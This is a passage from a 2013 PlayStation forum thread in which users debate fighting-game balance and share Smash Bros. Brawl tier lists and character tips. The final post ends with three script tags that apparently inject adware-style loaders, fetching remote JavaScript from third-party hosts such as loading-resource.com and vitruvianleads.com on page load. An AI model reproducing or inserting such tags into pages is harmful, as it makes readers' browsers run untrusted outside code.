Uncharted Territory
1512 posts

Re: Fun game, yet one of the worst balanced fighters of all time.

Jan 1, 2013
Enjoying them?(:
Lol see how these two games SEEM the same? But if you pay attention, you see a HUGE difference.

Also, do you see how Dabuz has high level experience in a game type like this way before PSAS came out? Ofcourse he's way ahead. Whatever character he uses is god tier compared to a a fairly new community. And even if you arent new to this gaming type, Dabuz still has the highest level of experience when it comes to gaming types like this compared to us. We just have to catch up(:
Photobucket Pictures, Images and Photos
Message 61 of 79 (145 Views)
0 Likes
Uncharted Territory
1512 posts

Jan 1, 2013
Marth is #7

1) Metaknight (broken **bleep**)
2) Olimar (very high learning curve)
3) Ice Climbers (twins: grab chains can kill you with one grab if done right)
4) Diddy Kong (Bananas: Annoying and if used right are deadly)
5) Snake (hard to kill, hits hard, broken hit box, and tools, also best DACUS in the game)
6) Falco (Flashy, hit n run, mobile, has trouble killing)
7) Marth (quick, ariel, close range, has no tange)

If you want vids of any of them just ask(:
Message 62 of 79 (142 Views)
Treasure Hunter
5310 posts

Jan 1, 2013

Falco is my main but unless you can goat people in to jumping off the edge into a spike.  It is really hard to kill with Falco.

Message 63 of 79 (132 Views)
Uncharted Territory
1512 posts

Jan 1, 2013
Yeah. I used Falco gor a bit instead of Wolf because he was easier to use & all I cared about was winning at the time. But I left out mind games & mix ups, that is ESSENTIAL to playing Falco. The moment u get into a habit and become predictable, you lose the match. Never dedicate to anything unless u know for certain u have it. Use the jab to be safe and short-hop-side-B to get quick, effecient space to camp.

P.S. This game is already more balanced then SSBB
Message 64 of 79 (114 Views)
0 Likes
Fender Bender
4137 posts

Jan 1, 2013

If you think this is one of the most unbalanced fighters.....please look into the Fighting Community. This is very balanced compared to some others out there.

#Reapers
Message 65 of 79 (90 Views)
Highlighted
Fender Bender
2538 posts

Jan 1, 2013
I find a lot of the comments declaring the game unbalanced very compelling, but one thing remains: I'm still having fun. I'm still being challenged in what I see is a fair way.

If it wasn't balanced, how would I ever feel like I accomplished a good win or barely lost to a good player? It seems like the people with issues against balance are EXPECTING to win more. Maybe they are bad players who are tired of losing, maybe they are good players who don't think they deserve to lose to a tactic they hate. Either way, I know there are people like me who are in the middle and are still being challenged while being rewarded for good play with wins.
Message 66 of 79 (82 Views)
Fender Bender
3755 posts

Jan 1, 2013
Is Ike good? I use to always use ike. Any videos of him ?
Message 67 of 79 (78 Views)
0 Likes
Uncharted Territory
1512 posts

Jan 1, 2013
Ike has power and is very noob-friendly (no offense), but at high level of play he has issues.

His recoveries are straight foward (either vertical pr horizontal) which makes his very susceptable to gimping (being hit to far off the stage to where you cannot recover) esspecially by Marth/Metaknights.

He's a straightfoward character with no range. Only practical mind games are hopping around and jab cancels, sometimes a random dash attack.

But this still doesnt mean he cant be a force is the right hands, but he's still in the bottom half of the tier list.
Message 68 of 79 (65 Views)
0 Likes
Uncharted Territory
1512 posts

Jan 1, 2013
The best Ike vs the best marth

http://youtu.be/VQ_LV8N61xM
Message 69 of 79 (61 Views)
0 Likes
Gaming Beast
2167 posts

[ Edited ]
Jan 1, 2013
This rght here is where I stopped reading: "Sly. Sir Dan, Dante, Spike, Fat Princess, Parappa, Raiden, Toro, Heihachi, Nariko, Jak, Radec, Ratchet, Good Cole, Evil Cole, Sackboy, Big Daddy, and Sweet Tooth are bad 1v1 match ups. Kratos, Drake, and another Sly are the only ones that have a good chance."

No... just no. Kratos and Sly are terrible at 1v1. EC, Good Cole, Heihachi, Toro and Raiden are all excellent 1v1 characters. I'm not sure how you came to such faulty conclusions.

Laybackkid wrote:
Marth is #7

1) Metaknight (broken **bleep**)
2) Olimar (very high learning curve)
3) Ice Climbers (twins: grab chains can kill you with one grab if done right)
4) Diddy Kong (Bananas: Annoying and if used right are deadly)
5) Snake (hard to kill, hits hard, broken hit box, and tools, also best DACUS in the game)
6) Falco (Flashy, hit n run, mobile, has trouble killing)
7) Marth (quick, ariel, close range, has no tange)

If you want vids of any of them just ask(:
Wow, Snake and Falco fell since I last played Smash.

EDIT: @ OP again... Why did I read more?

Rolling to avoid grabs? Seriously, did you play this game at all? Grabs beat rolls to avoid the very problem you wrote about...

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 70 of 79 (54 Views)